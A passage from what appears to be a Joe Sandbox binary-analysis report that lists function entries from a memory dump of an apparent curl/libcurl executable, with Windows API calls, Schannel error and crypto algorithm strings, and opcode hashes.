                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: FeaturePresentProcessor
                                        • String ID:
                                        • API String ID: 2325560087-0
                                        • Opcode ID: 21e3329fc2ddbc790fd65fc6764ed7e9e6469002613c8f44689f857e223c73bd
                                        • Instruction ID: adf4102bd331222b97b984e60443d736fb491ab2c1a1264a40e308a69191e2cb
                                        • Opcode Fuzzy Hash: 21e3329fc2ddbc790fd65fc6764ed7e9e6469002613c8f44689f857e223c73bd
                                        • Instruction Fuzzy Hash: 59518BB1A00615EBEB28CF99D8817EABBF1FB48710F14803ED505EBA51D3749992CF60
                                        APIs
                                        • CryptHashData.ADVAPI32(?,00000000,00109C33,00000000,?,0010F8E1,?,?,00109C33,00000000,?,00000000,?,?,00109C33,?), ref: 0010C741
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: CryptDataHash
                                        • String ID:
                                        • API String ID: 4245837645-0
                                        • Opcode ID: 95ad49e7498e0c8d6b4346cd9445f7e7906e1745ff353b86b67be2a06de00b0d
                                        • Instruction ID: e93cef2a4426548044e5f41497229ecb9e63d309b932355ada606d57eb302f02
                                        • Opcode Fuzzy Hash: 95ad49e7498e0c8d6b4346cd9445f7e7906e1745ff353b86b67be2a06de00b0d
                                        • Instruction Fuzzy Hash: 7FC00236140208EBCF015F84DD05ED97BAABB48751F048050BA1C4A561C772E5609B84
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000516D0,001111D5), ref: 001116C3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 10979a85b1cf626d1ae3fc0ab1b3f0d24437bc657cedefb78ec798f7133d0aa5
                                        • Instruction ID: 343affbba503889ad9ce81823a34b38062bbe564c62bdfaf341cfbef50fb6e07
                                        • Opcode Fuzzy Hash: 10979a85b1cf626d1ae3fc0ab1b3f0d24437bc657cedefb78ec798f7133d0aa5
                                        • Instruction Fuzzy Hash:
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction ID: e40239da6b8865e1b1a6b07afad88b35b9aad3ac8e7bdaf823b8a14d2e7c0974
                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                        • Instruction Fuzzy Hash: 8E11087730009243D60ECA2DD4B45FAE795EBC532072D427AD0B28BE5CD722EBC59905
                                        APIs
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000), ref: 000DA230
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA238
                                        • strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 000DA62C
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA63C
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000DA64C
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 000DA654
                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 000DA65F
                                        Strings
                                        • SEC_E_SECPKG_NOT_FOUND, xrefs: 000DA47F
                                        • SEC_E_NO_AUTHENTICATING_AUTHORITY, xrefs: 000DA3E9
                                        • SEC_E_TIME_SKEW, xrefs: 000DA4CF
                                        • SEC_E_TOO_MANY_PRINCIPALS, xrefs: 000DA4D9
                                        • SEC_E_CERT_WRONG_USAGE, xrefs: 000DA2C7
                                        • SEC_E_TARGET_UNKNOWN, xrefs: 000DA4C5
                                        • SEC_E_KDC_UNABLE_TO_REFER, xrefs: 000DA399
                                        • SEC_E_CERT_EXPIRED, xrefs: 000DA2B3
                                        • SEC_E_NO_TGT_REPLY, xrefs: 000DA42F
                                        • SEC_E_ISSUING_CA_UNTRUSTED, xrefs: 000DA367
                                        • SEC_E_MAX_REFERRALS_EXCEEDED, xrefs: 000DA3B7
                                        • SEC_E_REVOCATION_OFFLINE_KDC, xrefs: 000DA475
                                        • SEC_I_CONTEXT_EXPIRED, xrefs: 000DA57E
                                        • SEC_E_CANNOT_INSTALL, xrefs: 000DA29F
                                        • SEC_E_CRYPTO_SYSTEM_INVALID, xrefs: 000DA2E5
                                        • SEC_E_INCOMPLETE_CREDENTIALS, xrefs: 000DA321
                                        • SEC_E_BAD_PKGID, xrefs: 000DA28B
                                        • SEC_E_INCOMPLETE_MESSAGE, xrefs: 000DA32B
                                        • SEC_E_MUST_BE_KDC, xrefs: 000DA3D5
                                        • SEC_E_NO_IMPERSONATION, xrefs: 000DA3FD
                                        • SEC_E_DELEGATION_POLICY, xrefs: 000DA2F9
                                        • SEC_E_UNSUPPORTED_FUNCTION, xrefs: 000DA4F7
                                        • SEC_E_BUFFER_TOO_SMALL, xrefs: 000DA295
                                        • SEC_E_UNTRUSTED_ROOT, xrefs: 000DA50B
                                        • SEC_I_RENEGOTIATE, xrefs: 000DA5CB, 000DA5D8
                                        • SEC_I_COMPLETE_NEEDED, xrefs: 000DA569
                                        • SEC_E_DECRYPT_FAILURE, xrefs: 000DA2EF
                                        • SEC_I_NO_LSA_CONTEXT, xrefs: 000DA5C4
                                        • No error, xrefs: 000DA577
                                        • SEC_E_OUT_OF_SEQUENCE, xrefs: 000DA439
                                        • %s (0x%08X), xrefs: 000DA5D9
                                        • SEC_E_SHUTDOWN_IN_PROGRESS, xrefs: 000DA493
                                        • %s - %s, xrefs: 000DA60D
                                        • SEC_E_MESSAGE_ALTERED, xrefs: 000DA3C1
                                        • CRYPT_E_REVOKED, xrefs: 000DA529
                                        • SEC_E_CANNOT_PACK, xrefs: 000DA2A9
                                        • SEC_E_NO_CREDENTIALS, xrefs: 000DA3F3
                                        • SEC_E_INTERNAL_ERROR, xrefs: 000DA33F
                                        • SEC_E_BAD_BINDINGS, xrefs: 000DA281
                                        • SEC_E_NO_S4U_PROT_SUPPORT, xrefs: 000DA425
                                        • SEC_E_SMARTCARD_LOGON_REQUIRED, xrefs: 000DA4B1
                                        • SEC_E_REVOCATION_OFFLINE_C, xrefs: 000DA46B
                                        • SEC_E_PKINIT_NAME_MISMATCH, xrefs: 000DA44D
                                        • SEC_E_KDC_CERT_REVOKED, xrefs: 000DA385
                                        • SEC_E_MULTIPLE_ACCOUNTS, xrefs: 000DA3CB
                                        • SEC_E_CROSSREALM_DELEGATION_FAILURE, xrefs: 000DA2DB
                                        • SEC_E_INSUFFICIENT_MEMORY, xrefs: 000DA335
                                        • SEC_E_UNSUPPORTED_PREAUTH, xrefs: 000DA501
                                        • SEC_I_SIGNATURE_NEEDED, xrefs: 000DA5BD
                                        • SEC_E_WRONG_PRINCIPAL, xrefs: 000DA51F
                                        • SEC_E_SMARTCARD_CERT_EXPIRED, xrefs: 000DA49D
                                        • SEC_E_CONTEXT_EXPIRED, xrefs: 000DA2D1
                                        • SEC_E_NO_IP_ADDRESSES, xrefs: 000DA407
                                        • SEC_E_ALGORITHM_MISMATCH, xrefs: 000DA277
                                        • SEC_E_DOWNGRADE_DETECTED, xrefs: 000DA30D
                                        • SEC_E_KDC_CERT_EXPIRED, xrefs: 000DA37B
                                        • SEC_E_KDC_INVALID_REQUEST, xrefs: 000DA38F
                                        • SEC_E_SECURITY_QOS_FAILED, xrefs: 000DA489
                                        • SEC_E_DELEGATION_REQUIRED, xrefs: 000DA303
                                        • SEC_E_CERT_UNKNOWN, xrefs: 000DA2BD
                                        • SEC_E_SMARTCARD_CERT_REVOKED, xrefs: 000DA4A7
                                        • SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 000DA5A8
                                        • SEC_E_ENCRYPT_FAILURE, xrefs: 000DA317
                                        • SEC_E_ISSUING_CA_UNTRUSTED_KDC, xrefs: 000DA371
                                        • SEC_E_INVALID_HANDLE, xrefs: 000DA349
                                        • SEC_E_UNKNOWN_CREDENTIALS, xrefs: 000DA4ED
                                        • SEC_E_POLICY_NLTM_ONLY, xrefs: 000DA457
                                        • SEC_E_NOT_OWNER, xrefs: 000DA3DF
                                        • SEC_E_UNFINISHED_CONTEXT_DELETED, xrefs: 000DA4E3
                                        • SEC_E_INVALID_PARAMETER, xrefs: 000DA353
                                        • SEC_E_INVALID_TOKEN, xrefs: 000DA35D
                                        • SEC_E_STRONG_CRYPTO_NOT_SUPPORTED, xrefs: 000DA4BB
                                        • SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 000DA5D2
                                        • SEC_E_LOGON_DENIED, xrefs: 000DA3AD
                                        • SEC_E_PKINIT_CLIENT_FAILURE, xrefs: 000DA443
                                        • SEC_E_QOP_NOT_SUPPORTED, xrefs: 000DA461
                                        • SEC_E_NO_PA_DATA, xrefs: 000DA41B
                                        • SEC_I_LOCAL_LOGON, xrefs: 000DA55B
                                        • Unknown error, xrefs: 000DA59E
                                        • SEC_I_CONTINUE_NEEDED, xrefs: 000DA570
                                        • SEC_E_KDC_UNKNOWN_ETYPE, xrefs: 000DA3A3
                                        • SEC_E_WRONG_CREDENTIAL_HANDLE, xrefs: 000DA515
                                        • SEC_E_NO_KERB_KEY, xrefs: 000DA411
                                        • SEC_I_COMPLETE_AND_CONTINUE, xrefs: 000DA562
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ErrorLast_errno$strncpy
                                        • String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ALGORITHM_MISMATCH$SEC_E_BAD_BINDINGS$SEC_E_BAD_PKGID$SEC_E_BUFFER_TOO_SMALL$SEC_E_CANNOT_INSTALL$SEC_E_CANNOT_PACK$SEC_E_CERT_EXPIRED$SEC_E_CERT_UNKNOWN$SEC_E_CERT_WRONG_USAGE$SEC_E_CONTEXT_EXPIRED$SEC_E_CROSSREALM_DELEGATION_FAILURE$SEC_E_CRYPTO_SYSTEM_INVALID$SEC_E_DECRYPT_FAILURE$SEC_E_DELEGATION_POLICY$SEC_E_DELEGATION_REQUIRED$SEC_E_DOWNGRADE_DETECTED$SEC_E_ENCRYPT_FAILURE$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_E_INCOMPLETE_CREDENTIALS$SEC_E_INCOMPLETE_MESSAGE$SEC_E_INSUFFICIENT_MEMORY$SEC_E_INTERNAL_ERROR$SEC_E_INVALID_HANDLE$SEC_E_INVALID_PARAMETER$SEC_E_INVALID_TOKEN$SEC_E_ISSUING_CA_UNTRUSTED$SEC_E_ISSUING_CA_UNTRUSTED_KDC$SEC_E_KDC_CERT_EXPIRED$SEC_E_KDC_CERT_REVOKED$SEC_E_KDC_INVALID_REQUEST$SEC_E_KDC_UNABLE_TO_REFER$SEC_E_KDC_UNKNOWN_ETYPE$SEC_E_LOGON_DENIED$SEC_E_MAX_REFERRALS_EXCEEDED$SEC_E_MESSAGE_ALTERED$SEC_E_MULTIPLE_ACCOUNTS$SEC_E_MUST_BE_KDC$SEC_E_NOT_OWNER$SEC_E_NO_AUTHENTICATING_AUTHORITY$SEC_E_NO_CREDENTIALS$SEC_E_NO_IMPERSONATION$SEC_E_NO_IP_ADDRESSES$SEC_E_NO_KERB_KEY$SEC_E_NO_PA_DATA$SEC_E_NO_S4U_PROT_SUPPORT$SEC_E_NO_TGT_REPLY$SEC_E_OUT_OF_SEQUENCE$SEC_E_PKINIT_CLIENT_FAILURE$SEC_E_PKINIT_NAME_MISMATCH$SEC_E_POLICY_NLTM_ONLY$SEC_E_QOP_NOT_SUPPORTED$SEC_E_REVOCATION_OFFLINE_C$SEC_E_REVOCATION_OFFLINE_KDC$SEC_E_SECPKG_NOT_FOUND$SEC_E_SECURITY_QOS_FAILED$SEC_E_SHUTDOWN_IN_PROGRESS$SEC_E_SMARTCARD_CERT_EXPIRED$SEC_E_SMARTCARD_CERT_REVOKED$SEC_E_SMARTCARD_LOGON_REQUIRED$SEC_E_STRONG_CRYPTO_NOT_SUPPORTED$SEC_E_TARGET_UNKNOWN$SEC_E_TIME_SKEW$SEC_E_TOO_MANY_PRINCIPALS$SEC_E_UNFINISHED_CONTEXT_DELETED$SEC_E_UNKNOWN_CREDENTIALS$SEC_E_UNSUPPORTED_FUNCTION$SEC_E_UNSUPPORTED_PREAUTH$SEC_E_UNTRUSTED_ROOT$SEC_E_WRONG_CREDENTIAL_HANDLE$SEC_E_WRONG_PRINCIPAL$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
                                        • API String ID: 4135170618-3170461277
                                        • Opcode ID: 6927d9fe3d7bc3081a07503ab337080c7357398a00d2f04ef165e90cd8ef4549
                                        • Instruction ID: e70158165c38730c8a7deb9d8bfbfb2af028439b31d4b0a1fe3774a1ec956328
                                        • Opcode Fuzzy Hash: 6927d9fe3d7bc3081a07503ab337080c7357398a00d2f04ef165e90cd8ef4549
                                        • Instruction Fuzzy Hash: BD81F021708BAAD78B34475C7B049BD6554E713308B604123B622EFB48DB29CEA6F777
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2464
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2472
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C247E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C248A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2496
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,000C3167), ref: 000D0E2C
                                          • Part of subcall function 000D0E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 000D0E41
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24AA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24BE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24CA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24D9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24EB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C24FD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C250F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2521
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2533
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2545
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2557
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C256C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C257E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2590
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25A2
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25B4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25C6
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25D8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25EA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C25FC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C260E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2620
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C263D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C264F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2661
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C267F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C268C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2699
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26A4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26D1
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26E3
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C26F5
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2707
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2719
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C272B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C273D
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C274F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2761
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2773
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2785
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2797
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27A9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27BB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27CD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27DF
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C27F4
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2806
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2818
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C282A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C283C
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C284E
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2860
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2872
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2884
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2896
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28A8
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28BA
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28CC
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28DE
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C28F0
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2902
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2917
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2929
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C293B
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C294A
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C29D9
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C29EB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C29FD
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2A0F
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2A21
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 000C2A33
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID:
                                        • API String ID: 1294909896-0
                                        • Opcode ID: b517ebb787abe049bfd3f96fd098097e5b95780a53a2ed52637dae8ce26aec47
                                        • Instruction ID: 3641be66e3916f868a947a0871b255359d3282e2a57b7d728116115d0842b046
                                        • Opcode Fuzzy Hash: b517ebb787abe049bfd3f96fd098097e5b95780a53a2ed52637dae8ce26aec47
                                        • Instruction Fuzzy Hash: 19F10D76602E12EFDB8A5FA0D948AC9FB72BF48701F008206F92957621CB3525B1DFD5
                                        APIs
                                        • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000000,?,0000001F), ref: 00103B39
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,USE_STRONG_CRYPTO,00000011,0000001F), ref: 00103B59
                                        • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,SCH_USE_STRONG_CRYPTO,00000015,?,?,?,0000001F), ref: 00103B6E
                                        • ___from_strstr_to_strchr.LIBCMT ref: 00103B8E
                                          • Part of subcall function 00103B1A: ___from_strstr_to_strchr.LIBCMT ref: 0010345C
                                          • Part of subcall function 00103B1A: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,0000001F), ref: 0010349C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: ___from_strstr_to_strchrstrncmp$strncpystrtol
                                        • String ID: CALG_3DES$CALG_3DES_112$CALG_AES$CALG_AES_128$CALG_AES_192$CALG_AES_256$CALG_AGREEDKEY_ANY$CALG_CYLINK_MEK$CALG_DES$CALG_DESX$CALG_DH_EPHEM$CALG_DH_SF$CALG_DSS_SIGN$CALG_ECDH$CALG_ECDH_EPHEM$CALG_ECDSA$CALG_ECMQV$CALG_HASH_REPLACE_OWF$CALG_HMAC$CALG_HUGHES_MD5$CALG_MAC$CALG_MD2$CALG_MD4$CALG_MD5$CALG_NO_SIGN$CALG_PCT1_MASTER$CALG_RC2$CALG_RC4$CALG_RC5$CALG_RSA_KEYX$CALG_RSA_SIGN$CALG_SCHANNEL_ENC_KEY$CALG_SCHANNEL_MAC_KEY$CALG_SCHANNEL_MASTER_HASH$CALG_SEAL$CALG_SHA$CALG_SHA1$CALG_SHA_256$CALG_SHA_384$CALG_SHA_512$CALG_SKIPJACK$CALG_SSL2_MASTER$CALG_SSL3_MASTER$CALG_SSL3_SHAMD5$CALG_TEK$CALG_TLS1PRF$CALG_TLS1_MASTER$SCH_USE_STRONG_CRYPTO$USE_STRONG_CRYPTO
                                        • API String ID: 3873730638-2313236003
                                        • Opcode ID: 8cccdd7534c61115e4d099503e35826f3175b2a4b924ebb4b3c3dab671533ef5
                                        • Instruction ID: 8bb2f77641df08802286eef752fa63abe88fe5cf709aa830b94b44d8ee087f5b
                                        • Opcode Fuzzy Hash: 8cccdd7534c61115e4d099503e35826f3175b2a4b924ebb4b3c3dab671533ef5
                                        • Instruction Fuzzy Hash: 2E114832641F206BD7395B25AC91B96778C9F91BADF004025EDA5DA2C1E7E08B82C2D5
                                        APIs
                                        • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 000CA600
                                        • ioctlsocket.WS2_32(?,8004667E,?), ref: 000CA637
                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000CA641
                                        • strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 000CA649
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2055096731.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                        • Associated: 00000003.00000002.2055061437.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055152375.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055195052.000000000012F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2055233144.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_c0000_TNheBOJElq.jbxd
                                        Similarity
                                        • API ID: __acrt_iob_func_errnoioctlsocketstrerror
                                        • String ID: %s%c%s$://$CURLOPT_BUFFERSIZE$CURLOPT_INTERLEAVEDATA$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_PROXY$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_TCP_FASTOPEN$CURLOPT_TCP_NODELAY$CURLOPT_URL$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XOAUTH2_BEARER$Ph'$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$SWj$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$V;J$VLI$V[J$ViI$VI$VJ$fcntl failed on fd=%d: %s$h+N$h,N$ht'$http://$https://$proxy support is disabled in this libcurl$k%$wJ
                                        • API String ID: 1657940537-1927208717
